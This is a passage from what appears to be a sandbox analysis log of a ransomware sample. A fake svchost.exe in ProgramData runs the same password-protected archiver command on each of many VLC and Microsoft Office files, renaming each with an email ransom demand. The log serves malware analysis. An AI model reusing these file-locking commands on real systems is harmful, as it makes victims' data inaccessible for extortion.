  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\NEWS.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\NEWS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\README.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\THANKS.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\THANKS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
